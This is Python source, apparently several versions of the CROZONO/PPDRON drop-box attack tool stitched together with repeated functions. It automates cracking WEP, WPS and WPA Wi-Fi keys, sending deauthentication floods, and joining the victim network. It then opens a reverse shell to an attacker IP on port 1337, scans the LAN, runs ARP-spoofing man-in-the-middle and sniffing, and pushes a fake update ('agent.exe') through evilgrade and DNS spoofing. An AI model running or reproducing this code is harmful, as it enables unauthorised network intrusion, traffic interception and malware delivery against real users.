def run(self):
proc_airodump = subprocess.Popen([
'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c',
settings.TARGET_CHANNEL, '-w', 'cr0z0n0_attack',
settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
info("Running an association & packet injection attack")
cmd_auth = pexpect.spawn(
'aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format(
settings.TARGET_ESSID, settings.TARGET_BSSID, settings.NEW_MAC,
settings.INTERFACE_MON))
cmd_auth.logfile = open(settings.LOG_FILE, 'wb')
cmd_auth.expect(
['Association successful', pexpect.TIMEOUT, pexpect.EOF], 20)
cmd_auth.close()
parse_log_auth = open(settings.LOG_FILE, 'r')
for line in parse_log_auth:
if line.find('Association successful') != -1:
info("Association successful :-) injecting packets...")
parse_log_auth.close()
os.remove(settings.LOG_FILE)
proc_aireplay = subprocess.Popen([
'aireplay-ng', '-3', '-e', '"' + settings.TARGET_ESSID + '"', '-b',
settings.TARGET_BSSID, '-h', settings.NEW_MAC,
settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(settings.WEP_AIREPLAY_TIME)
cmd_crack = pexpect.spawn('aircrack-ng cr0z0n0_attack-01.cap')
cmd_crack.logfile = open(settings.LOG_FILE, 'wb')
cmd_crack.expect(
['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF], 30)
cmd_crack.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
wh = line.find('KEY FOUND!')
if wh > -1:
if 'ASCII' in line:
wh2 = line.find('ASCII')
key_start = 'ASCII('
key_end = line.find(')')
settings.TARGET_KEY = line[wh2 + len(key_start):key_end]
else:
key_start = 'KEY FOUND!'
key_end = line.find(']')
settings.TARGET_KEY = line[wh +
len(key_start):key_end].strip(
) # 13 (?)
parse_log_crack.close()
os.remove(settings.LOG_FILE)
if settings.TARGET_KEY is None:
warn("Attack failed!")
def run(self):
info("Running Pixie Dust attack...")
report.saveLog("Running Pixie Dust attack...")
cmd_reaver = pexpect.spawn(
'reaver -i {0} -c {1} -b {2} -vv -K 1'.format(
settings.INTERFACE_MON, settings.TARGET_CHANNEL,
settings.TARGET_BSSID))
cmd_reaver.logfile = open(settings.LOG_FILE, 'wb')
cmd_reaver.expect(
['WPA PSK:', 'WPS pin not found!', pexpect.TIMEOUT, pexpect.EOF],
30)
cmd_reaver.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
if 'WPA PSK:' in line:
key_reg = re.split("('.*?')|(\".*?\")", line)
key_filter = key_reg[1].replace("'", "")
settings.TARGET_KEY = key_filter
break
parse_log_crack.close()
os.remove(settings.LOG_FILE)
if settings.TARGET_KEY is None:
warn("Pixie Dust attack failed!")
report.saveLog("Pixie Dust attack failed!")
def run(self):
proc_airodump = subprocess.Popen([
'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c',
settings.TARGET_CHANNEL, '-w', 'PPDRON_attack',
settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
info(
"Trying to get the handshake (sending deauthentication packets...)"
)
report.saveLog(
"Trying to get the handshake (sending deauthentication packets...)"
)
cmd_aireplay = pexpect.spawn('aireplay-ng -0 10 -a {0} {1}'.format(
settings.TARGET_BSSID, settings.INTERFACE_MON))
time.sleep(10)
cmd_aireplay.close()
time.sleep(settings.WPA_EXPECT_HANDSHAKE_TIME)
cmd_pyrit = pexpect.spawn('pyrit -r PPDRON_attack-01.cap analyze')
cmd_pyrit.logfile = open(settings.LOG_FILE, 'wb')
cmd_pyrit.expect(['No valid', 'good', pexpect.TIMEOUT, pexpect.EOF])
cmd_pyrit.close()
handshake = True
parse_log_pyrit = open(settings.LOG_FILE, 'r')
for line in parse_log_pyrit:
if "No valid" in line:
warn("We couldn't get the handshake :-(")
report.saveLog("We couldn't get the handshake :-(")
handshake = False
parse_log_pyrit.close()
os.remove(settings.LOG_FILE)
if handshake != False:
info("We have something :-) Making a dictionary attack...")
report.saveLog(
"We have something :-) Making a dictionary attack...")
cmd_crack = pexpect.spawn(
'aircrack-ng -w dictionary_wpa2 PPDRON_attack-01.cap')
cmd_crack.logfile = open(settings.LOG_FILE, 'wb')
cmd_crack.expect(
['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF])
cmd_crack.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
wh = line.find('KEY FOUND!')
if wh > -1:
key_end = line.find(']')
settings.TARGET_KEY = line[wh + 13:key_end]
break
parse_log_crack.close()
os.remove(settings.LOG_FILE)
if settings.TARGET_KEY is None:
warn("Dictionary attack failed!")
report.saveLog("Dictionary attack failed!")
def connect(essid, key, iface_mon=None):
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
if iface_mon is not None:
call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN)
time.sleep(1)
iface = get_ifaces()[0]
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(essid, key if key is not None else ''))
cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
cmd_connect.logfile = open(LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + essid + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + key.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
call(['iwconfig', iface, 'mode', 'managed'])
call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface], stdout=DN,
stderr=DN)
time.sleep(2)
parse_log_connect.close()
os.remove(LOG_FILE)
tries += 1
call(['dhclient', iface], stdout=DN, stderr=DN)
time.sleep(4)
do_connect()
if get_current_essid(iface) != essid and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(e=essid))
do_connect()
if get_current_essid(iface) == essid:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(iface[:15], 'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(e=essid, i=ipaddr))
return ipaddr
else:
error('Could not connect to {e} after 5 tries. Aborting'.format(e=essid))
exit(1)
def connect_to_lan():
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
if settings.INTERFACE_MON is not None:
device_mgr.toggle_mode_monitor(False)
time.sleep(1)
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(settings.TARGET_ESSID, settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(settings.INTERFACE, settings.TARGET_ESSID, settings.TARGET_KEY))
cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(settings.LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
subprocess.call(['ifconfig', settings.INTERFACE, 'down'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['dhclient', settings.INTERFACE, '-r'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['ifconfig', settings.INTERFACE, 'up'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['iwconfig', settings.INTERFACE, 'mode', 'managed'])
subprocess.call(['killall', 'wpa_supplicant'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', settings.INTERFACE], stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(2)
parse_log_connect.close()
os.remove(settings.LOG_FILE)
tries += 1
subprocess.call(['dhclient', settings.INTERFACE], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
time.sleep(4)
do_connect()
if get_current_essid() != settings.TARGET_ESSID and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(e=settings.TARGET_ESSID))
do_connect()
if get_current_essid() == settings.TARGET_ESSID:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(settings.INTERFACE[:15], 'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(e=settings.TARGET_ESSID, i=ipaddr))
settings.IP_LAN = ipaddr.strip()
else:
error('Could not connect to {e} after 5 tries. Aborting'.format(e=settings.TARGET_ESSID))
exit(1)
def logout(timeout: int):
global session
session.sendline('exit')
r = session.expect([pexpect.EOF, 'Connection to', pexpect.TIMEOUT], timeout=timeout)
if r in (0, 1):
return True
else:
session.sendline('kill -9 $$')
log.warn('Connection killed itself')
return False
def set_up_logging():
global logging
global session
if logging is None:
return
if logging.get('file') is not None:
# TODO: Log to file
log.error('Log to file no implemented. Yet.')
elif logging.get('console'):
session.logfile = sys.stdout
else:
log.warn('Logging disabled')
def main():
banner()
report.initLog()
report.initReport()
if not checks.check_root():
error('You need root privileges to run PPDRON!\n')
report.saveLog('You need root privileges to run PPDRON!\n')
generateReport()
exit(1)
if not checks.check_wlan_tools_dependencies():
generateReport()
exit(1)
args = parse_args()
settings.OS_PATH = os.getcwd()
settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
settings.INTERFACE = device_mgr.get_ifaces(
)[0] if settings.INTERFACE is None else settings.INTERFACE
settings.DELAY = args.delay if args.delay is not None else settings.DELAY
settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
delay = float(settings.DELAY) * 60
time.sleep(delay)
report.saveLog('PPDRON running...')
info('PPDRON running...')
if settings.TARGET_ESSID is not None:
if settings.TARGET_KEY is not None:
ap_target = None
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
# -------------------- Infiltrate wifi ------------------------------------------------
if ap_target is not None:
settings.TARGET_ESSID = ap_target.get('ESSID').strip()
settings.TARGET_BSSID = ap_target.get('BSSID').strip()
settings.TARGET_CHANNEL = ap_target.get('channel').strip()
settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()
info('Target selected: ' + settings.TARGET_ESSID + ' Channel: ' +
settings.TARGET_CHANNEL + ' Privacy: ' + settings.TARGET_PRIVACY)
report.saveLog('Target selected: ' + settings.TARGET_ESSID +
' Channel: ' + settings.TARGET_CHANNEL + ' Privacy: ' +
settings.TARGET_PRIVACY)
if settings.TARGET_PRIVACY == 'WEP':
report.TARGET_ATTACK = 'Fuerza bruta'
info('Cracking {e} access point with WEP privacy...'.format(
e=settings.TARGET_ESSID))
report.saveLog(
'Cracking {e} access point with WEP privacy...'.format(
e=settings.TARGET_ESSID))
wep_modules = find_modules('wep')
for wep_module in wep_modules:
attack = import_module(wep_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info('Key found!: {k} '.format(k=settings.TARGET_KEY))
report.saveLog(
'Key found!: {k} '.format(k=settings.TARGET_KEY))
lan_mgr.save_key()
break
else:
pass
if settings.TARGET_KEY is None:
error('Key not found! :-(')
report.saveLog(
'Key found!: {k} '.format(k=settings.TARGET_KEY))
generateReport()
exit(0)
elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2WPA' or settings.TARGET_PRIVACY == 'WPA2 WPA':
info('Cracking {e} access point with {p} privacy...'.format(
e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
report.saveLog(
'Cracking {e} access point with {p} privacy...'.format(
e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
wps = wash.wash_scan()
if wps:
info('WPS is enabled')
report.saveLog('WPS is enabled')
wps_modules = find_modules('wps')
for wps_module in wps_modules:
attack = import_module(wps_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
report.TARGET_ATTACK = 'Ataque al WPS'
info('Key found!: {k} '.format(
k=settings.TARGET_KEY))
report.saveLog('Key found!: {k} '.format(
k=settings.TARGET_KEY))
break
else:
pass
if settings.TARGET_KEY is None:
if wps:
warn(
'PIN not found! :-( Running WPA/WPA2 attack modules...'
)
report.saveLog(
'PIN not found! :-( Running WPA/WPA2 attack modules...'
)
wpa_modules = find_modules('wpa')
for wpa_module in wpa_modules:
attack = import_module(wpa_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info('Key found!: {k} '.format(
k=settings.TARGET_KEY))
report.saveLog('Key found!: {k} '.format(
k=settings.TARGET_KEY))
report.TARGET_ATTACK = 'Ataque de diccionario'
break
else:
pass
if settings.TARGET_KEY is None: # still...
error('Key not found! :-(')
report.saveLog('Key not found! :-(')
generateReport()
exit(0)
else:
lan_mgr.save_key()
else:
info('Open network!')
report.saveLog('Open network!')
report.TARGET_ATTACK = 'Ninguno'
info('PPDRON has finished! Good bye! ;)')
report.saveLog('PPDRON has finished! Good bye! ;)')
generateReport()
def main():
banner()
if not check_root():
error('You need root privileges to run CROZONO!\n')
exit(1)
if not check_wlan_attacks_dependences():
exit(1)
info("CROZONO running...")
args = parse_args()
if args.essid is not None:
if args.key is not None:
ap_target = False
ip_lan = connect(args.essid, args.key)
else:
iface_mon = hardware_setup()
new_mac = mac_changer(iface_mon)
ap_target = scan_targets(iface_mon, args.essid)
else:
iface_mon = hardware_setup()
new_mac = mac_changer(iface_mon)
ap_target = scan_targets(iface_mon)
# -------------------- Infiltrate wifi --------------------
if ap_target:
target_essid = ap_target.get('ESSID').strip()
target_bssid = ap_target.get('BSSID').strip()
target_channel = ap_target.get('channel').strip()
target_privacy = ap_target.get('Privacy').strip()
info("Target selected: " + target_essid)
if target_privacy == 'WEP':
info("Cracking {e} access point with WEP privacy...".format(e=target_essid))
key = wep_attack(target_essid, target_bssid, target_channel, new_mac, iface_mon)
if not key:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=key))
save_key(target_essid, key)
ip_lan = connect(target_essid, key, iface_mon)
elif target_privacy == 'WPA' or target_privacy == 'WPA2' or target_privacy == 'WPA2 WPA':
info("Cracking {e} access point with {p} privacy...".format(e=target_essid, p=target_privacy))
wps = wps_check(target_bssid, iface_mon)
if wps:
info("WPS is enabled")
key = wpa_with_wps_attack(target_bssid, target_channel, iface_mon)
if not key:
warn("PIN not found! Trying with conventional WPA attack...")
key = wpa_attack(target_bssid, target_channel, iface_mon)
else:
warn("WPS is not enabled")
key = wpa_attack(target_bssid, target_channel, iface_mon)
if not key:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=key))
save_key(target_essid, key)
ip_lan = connect(target_essid, key, iface_mon)
else:
info("Open network!")
ip_lan = connect(target_essid, None, iface_mon)
# -------------------- Acquired LAN range --------------------
ip_lan = ip_lan.strip()
net = ip_lan.split('.')
range_net = net[0] + '.' + net[1] + '.' + net[2] + '.1-255'
# -------------------- Connect to attacker and relay nmap info --------------------
if os.path.exists(OS_PATH + '/cr0z0n0_nmap'):
os.remove(OS_PATH + '/cr0z0n0_nmap')
if not check_lan_attacks_dependences():
exit(1)
attacker = args.dest
if attacker is not None:
info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=attacker))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((attacker, 1337))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
banner()
info("Hello! :)")
info("Executing Nmap...")
call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', ip_lan, range_net], stderr=DN)
else:
warn("Attacker not defined! Ending...")
exit()
# -------------------- Attacks --------------------
attack = args.attack
if attack == 'sniffing-mitm':
iface = get_ifaces()[0]
gateway = get_gateway().strip()
target_mitm = get_target_mitm(gateway, ip_lan)
info("Executing MITM and Sniffing attacks between {g} and {m}...".format(g=gateway, m=target_mitm))
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(g=gateway, m=target_mitm, i=iface))
time.sleep(2)
# cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=iface))
proc = subprocess.call(["tshark", "-i", iface], stderr=DN)
elif attack == 'evilgrade':
modules = open(OS_PATH + '/evilgrade/modules.txt', 'r')
agent = OS_PATH + '/evilgrade/agent.exe'
for line in modules:
print(line.replace('\n', ''))
print("\n\n Select module to use: ")
plugin = input()
info("Thank you! Evilgrade will be executed!")
s.shutdown(1)
if os.path.exists('/etc/ettercap/etter.dns'):
call(['rm', '/etc/ettercap/etter.dns'])
etter_template = open(OS_PATH + '/evilgrade/etter.dns.template', 'r')
etter_dns = open(OS_PATH + '/evilgrade/etter.dns', 'w')
for line in etter_template:
line = line.replace('IP', ip_lan)
etter_dns.write(line)
etter_dns.close()
etter_template.close()
call(['mv', './evilgrade/etter.dns', '/etc/ettercap/etter.dns'])
evilgrade = pexpect.spawn('evilgrade')
evilgrade.expect('evilgrade>')
evilgrade.sendline('configure ' + plugin)
evilgrade.sendline('set agent ' + agent)
evilgrade.sendline('start')
time.sleep(1)
iface = get_ifaces()[0]
gateway = get_gateway().strip()
target_mitm = get_target_mitm(gateway, ip_lan)
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i} -P dns_spoof'.format(g=gateway, m=target_mitm, i=iface))
time.sleep(EVILGRADE_ATTACK_TIME)
elif attack == 'metasploit':
info("Executing Metasploit...")
proc = subprocess.call(["msfconsole"], stderr=DN)
else:
warn("Attack not defined!")
s.shutdown(1)
info("CROZONO has finished! Good bye! ;)")
def connect(essid, key, iface_mon=None):
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
iface = get_ifaces()[0]
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(
essid, key if key is not None else ''))
if iface_mon is not None:
call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN)
time.sleep(1) # TODO: Necessary? - yep for Raspbian.
cmd_connect = pexpect.spawn(
'iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
cmd_connect.logfile = open(LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open(
'/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write(
'ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + essid + '"\n')
wpa_supplicant.write(
'key_mgmt=WPA-PSK\n'
) # TODO: Always wpa-psk? - No problem yet.
wpa_supplicant.write('psk="' + key.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
call(['iwconfig', iface, 'mode', 'managed'])
call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
call([
'wpa_supplicant', '-B', '-c',
'/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface
],
stdout=DN,
stderr=DN)
time.sleep(2)
parse_log_connect.close()
os.remove(LOG_FILE)
tries += 1
call(['dhclient', iface], stdout=DN, stderr=DN)
time.sleep(4)
do_connect()
if get_current_essid(iface) != essid and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(e=essid))
do_connect()
if get_current_essid(iface) == essid:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(sock.fileno(), 0x8915,
struct.pack('256s', bytes(iface[:15],
'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(e=essid,
i=ipaddr))
return ipaddr
else:
error(
'Could not connect to {e} after 5 tries. Aborting'.format(e=essid))
exit(1)
def main():
banner()
if not check_root():
error('You need root privileges to run CROZONO!\n')
exit(1)
if not check_wlan_attacks_dependences():
exit(1)
info("CROZONO running...")
args = parse_args()
if args.essid is not None:
if args.key is not None:
ap_target = False
ip_lan = connect(args.essid, args.key)
else:
iface_mon = hardware_setup()
new_mac = mac_changer(iface_mon)
ap_target = scan_targets(iface_mon, args.essid)
else:
iface_mon = hardware_setup()
new_mac = mac_changer(iface_mon)
ap_target = scan_targets(iface_mon)
# -------------------- Infiltrate wifi --------------------
if ap_target != False:
target_essid = ap_target.get('ESSID').strip()
target_bssid = ap_target.get('BSSID').strip()
target_channel = ap_target.get('channel').strip()
target_privacy = ap_target.get('Privacy').strip()
info("Target selected: " + target_essid)
if target_privacy == 'WEP':
info("Cracking {e} access point with WEP privacy...".format(
e=target_essid))
key = WEP_attack(target_essid, target_bssid, target_channel,
new_mac, iface_mon)
if key == False:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=key))
save_key(target_essid, key)
ip_lan = connect(target_essid, key, iface_mon)
elif target_privacy == 'WPA' or target_privacy == 'WPA2' or target_privacy == 'WPA2 WPA':
info("Cracking {e} access point with {p} privacy...".format(
e=target_essid, p=target_privacy))
WPS = WPS_check(target_bssid, iface_mon)
if WPS == True:
info("WPS is enabled")
key = WPA_with_WPS_attack(target_bssid, target_channel,
iface_mon)
if key == False:
warn(
"PIN not found! Trying with conventional WPA attack..."
)
key = WPA_attack(target_bssid, target_channel, iface_mon)
else:
warn("WPS is not enabled")
key = WPA_attack(target_bssid, target_channel, iface_mon)
if key == False:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=key))
save_key(target_essid, key)
ip_lan = connect(target_essid, key, iface_mon)
else:
info("Open network!")
ip_lan = connect(target_essid, None, iface_mon)
# -------------------- Acquired LAN range --------------------
ip_lan = ip_lan.strip()
net = ip_lan.split('.')
range_net = net[0] + '.' + net[1] + '.' + net[2] + '.1-255'
# -------------------- Connect to attacker and relay nmap info --------------------
if os.path.exists(OS_PATH + '/cr0z0n0_nmap'):
os.remove(OS_PATH + '/cr0z0n0_nmap')
if not check_lan_attacks_dependences():
exit(1)
attacker = args.dest
if attacker is not None:
info(
"Sending information about network to attacker ({ip}) and running attacks..."
.format(ip=attacker))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((attacker, 1337))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
banner()
info("Hello! :)")
info("Executing Nmap...")
call([
'nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', ip_lan,
range_net
],
stderr=DN)
else:
warn("Attacker not defined! Ending...")
exit()
# -------------------- Attacks --------------------
attack = args.attack
if attack == 'sniffing-mitm':
iface = get_ifaces()[0]
gateway = get_gateway().strip()
target_mitm = get_target_mitm(gateway, ip_lan)
info("Executing MITM and Sniffing attacks between {g} and {m}...".
format(g=gateway, m=target_mitm))
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(
g=gateway, m=target_mitm, i=iface))
time.sleep(2)
#cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=iface))
proc = subprocess.call(["tshark", "-i", iface], stderr=DN)
elif attack == 'evilgrade':
modules = open(OS_PATH + '/evilgrade/modules.txt', 'r')
agent = OS_PATH + '/evilgrade/agent.exe'
for line in modules:
print(line.replace('\n', ''))
print("\n\n Select module to use: ")
plugin = raw_input()
info("Thank you! Evilgrade will be executed!")
s.shutdown(1)
if os.path.exists('/etc/ettercap/etter.dns'):
call(['rm', '/etc/ettercap/etter.dns'])
etter_template = open(OS_PATH + '/evilgrade/etter.dns.template', 'r')
etter_dns = open(OS_PATH + '/evilgrade/etter.dns', 'w')
for line in etter_template:
line = line.replace('IP', ip_lan)
etter_dns.write(line)
etter_dns.close()
etter_template.close()
call(['mv', './evilgrade/etter.dns', '/etc/ettercap/etter.dns'])
evilgrade = pexpect.spawn('evilgrade')
evilgrade.expect('evilgrade>')
evilgrade.sendline('configure ' + plugin)
evilgrade.sendline('set agent ' + agent)
evilgrade.sendline('start')
time.sleep(1)
iface = get_ifaces()[0]
gateway = get_gateway().strip()
target_mitm = get_target_mitm(gateway, ip_lan)
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i} -P dns_spoof'.format(
g=gateway, m=target_mitm, i=iface))
time.sleep(EVILGRADE_ATTACK_TIME)
elif attack == 'metasploit':
info("Executing Metasploit...")
proc = subprocess.call(["msfconsole"], stderr=DN)
else:
warn("Attack not defined!")
s.shutdown(1)
info("CROZONO has finished! Good bye! ;)")
def connect_to_lan():
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
if settings.INTERFACE_MON is not None:
device_mgr.toggle_mode_monitor(False)
time.sleep(1)
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(
settings.TARGET_ESSID,
settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
cmd_connect = pexpect.spawn(
'iwconfig {0} essid "{1}" key s:{2}'.format(
settings.INTERFACE, settings.TARGET_ESSID,
settings.TARGET_KEY))
cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(settings.LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open(
'/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write(
'ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() +
'"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
subprocess.call(['ifconfig', settings.INTERFACE, 'down'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(['dhclient', settings.INTERFACE, '-r'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(['ifconfig', settings.INTERFACE, 'up'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(
['iwconfig', settings.INTERFACE, 'mode', 'managed'])
subprocess.call(['killall', 'wpa_supplicant'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call([
'wpa_supplicant', '-B', '-c',
'/etc/wpa_supplicant/wpa_supplicant.conf', '-i',
settings.INTERFACE
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(2)
parse_log_connect.close()
os.remove(settings.LOG_FILE)
tries += 1
subprocess.call(['dhclient', settings.INTERFACE],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(4)
do_connect()
if get_current_essid() != settings.TARGET_ESSID and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(
e=settings.TARGET_ESSID))
do_connect()
if get_current_essid() == settings.TARGET_ESSID:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(
sock.fileno(), 0x8915,
struct.pack('256s', bytes(settings.INTERFACE[:15],
'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(
e=settings.TARGET_ESSID, i=ipaddr))
settings.IP_LAN = ipaddr.strip()
else:
error('Could not connect to {e} after 5 tries. Aborting'.format(
e=settings.TARGET_ESSID))
exit(1)
def main():
banner()
if not checks.check_root():
error('You need root privileges to run CROZONO!\n')
exit(1)
if not checks.check_wlan_tools_dependencies():
exit(1)
args = parse_args()
settings.OS_PATH = os.getcwd()
settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
settings.INTERFACE = device_mgr.get_ifaces(
)[0] if settings.INTERFACE is None else settings.INTERFACE
settings.DELAY = args.delay if args.delay is not None else settings.DELAY
settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
settings.IP_ATTACKER = args.connect if args.connect is not None else settings.IP_ATTACKER
settings.LAN_DISCOVERY = args.discovery if args.discovery is not None else settings.LAN_DISCOVERY
settings.ATTACK = args.attack if args.attack is not None else settings.ATTACK
delay = float(settings.DELAY) * 60
time.sleep(delay)
info("CROZONO running...")
